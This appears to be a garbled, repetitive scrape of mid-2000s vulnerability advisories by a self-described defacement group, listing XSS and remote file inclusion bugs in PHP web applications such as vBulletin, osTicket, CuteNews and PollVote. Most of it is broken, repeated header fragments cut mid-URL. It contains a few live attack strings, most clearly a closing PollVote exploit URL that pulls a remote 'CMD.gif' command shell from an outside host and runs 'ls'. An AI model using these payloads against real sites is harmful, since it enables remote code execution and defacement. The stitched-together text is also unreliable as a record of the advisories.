.: XSS
+ Risk ..: high
+ Found by ..: Ahmed atif abdou [ OCERT Ambassador Program - Oman National CERT ]
+ Facebook .: https://www.facebook.com/runvirus
+ Contact ...: stormhacker[at]hotmail[.]com
.: XSS
+ Risk ..: Low
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.sec-area.com/
+ Contact ...: stormhacker[at]hotmail[.]com
+ Vulnerable Script..: showthread.php
+
New Include Redirect Bug
.: XSS
+ Risk ..: Low
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.sec-area.com/
+ Contact ...: stormhacker[at]hotmail[.]com
+
+
New Include Redirect Bug XSS All vBulletin v 3.x.x
advisory .: http://www.sec-area.com/
+ Contact ...: stormhacker[at]hotmail[.]com
+
+
+ PoC:
+
+ Database error SQL
+
// do not limit
+ Risk ..: high (Local File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.sec-area.com/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
+
+
+ PoC:
+
+http
.: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.sec-area.com/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
://www.phpwebscripts.com/
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.sec-area.com/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
# TOPSTORY BASIC Version 1.0 = Remote File Include Vulnerability
# Script.. :TOPSTORY
# Discovered By : rUnViRuS
# Class.. : Remote
# Original Advisory : http://sec-area.com
#
# file :- index.php
# bug Code :- include($tst[headerfile]);
script:- osTicket Open Source Support Ticket System
site:- http://www.osticket.com
exploit by runvirus
http://www.host/path/include/open_form.php?include_dir=
welcome in www.sec-area.com
://www.net2ftp.com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
://www.comdevweb.com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
://www.comdevweb.com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
://www.comdevweb.com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
://www.comdevweb.com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
://www.comdevweb.com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
://www.comdevweb.com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
://www.comdevweb.com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
://www.comdevweb.com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
://www.comdevweb.com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
...: http://www.phpselect.com/
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
://www.comdevweb.com
+ Class .: Remote File Inclusion
+ Risk ..: high (Remote File Execution)
+ Found by ..: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
+ Contact ...: stormhacker[at]hotmail[.]com
[W]orld [D]efacers Team
Summary
eVuln ID: WD26
Vendor: Deparcq Pieter project
Dook:- Copyright © 2004 by Deparcq Pieter Dries Van Thourhout
Software: Live Customer Support Solution :- http://www.davidsfonds-roeselare.be/
Class: Remote
[W]orld [D]efacers Team
==
Summary
eVuln ID: WD23
Vendor: SimpleBoard Mambo Component 1.1.0
Vendor's Web Site: mamboxchange.com/projects/simpleboard
Class: Remote
PoC/Exploit: Available
Solution: Not Available
[W]orld [D]efacers Team
Summary
eVuln ID: WD23
Vendor: phpopenchat-3.0.*
Vendor's Web Site: http://phpopenchat.org
Class: Remote
PoC/Exploit: Available
Solution: Not Available
Discovered by: rUnViRuS ( wdzone.net worlddefacers.de )
Welcome people In World Defacers Team
[W]orld [D]efacers Team
==
Summary
eVuln ID: WD22
Vendor: CuteNews 1.3.*
Vendor's Web Site: http://cutephp.com/
Software: Live Customer Support Solution :-
Welcome people In World Defacers Team
[W]orld [D]efacers Team
==
Summary
eVuln ID: WD21
Vendor: MKPortal 1.0.1 Final
Vendor's Web Site: wttp://www.kaimanweb.net
Software: Live Customer Support Solution :-
Hey
look at this
http://www.securityfocus.com/archive/1/428976
I found these bugs on Mar 27 2006
http://www.worlddefacers.de/Public/WD-TMPLH.txt
[W]orld [D]efacers Team
==
Summary
eVuln ID: WD10
Vendor: SimpleBBS
Vendor's Web Site: www.simplemedia.org
Software: SimpleBBS Forums
Software's Web Site: www.simplemedia.org
Versions: v1.1 v 1.0.*
Class: Remote
PoC/Exploit:
[W]orld [D]efacers Team
==
Summary
eVuln ID: WD00
Vendor: phplivehelper
Vendor's Web Site: www.phplivehelper.com
Software: Live Customer Support Solution
Software's Web Site:
Summary
Software: bttlxeForum
Software's Web Site: http://www.bttlxe.com/
Versions: 2.*
Type: Cross-Site Scripting
Class: Remote
Exploit: Available
Solution: Not Available
Discovered by: runvirus
(worlddefacers.de securitycentra.com)
Title: PollVote Remote File Inclusion
http://www.worlddefacers.net
Vulnerability Discovery: rUnViRuS
--
exploit :-
http://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gif?cmd=ls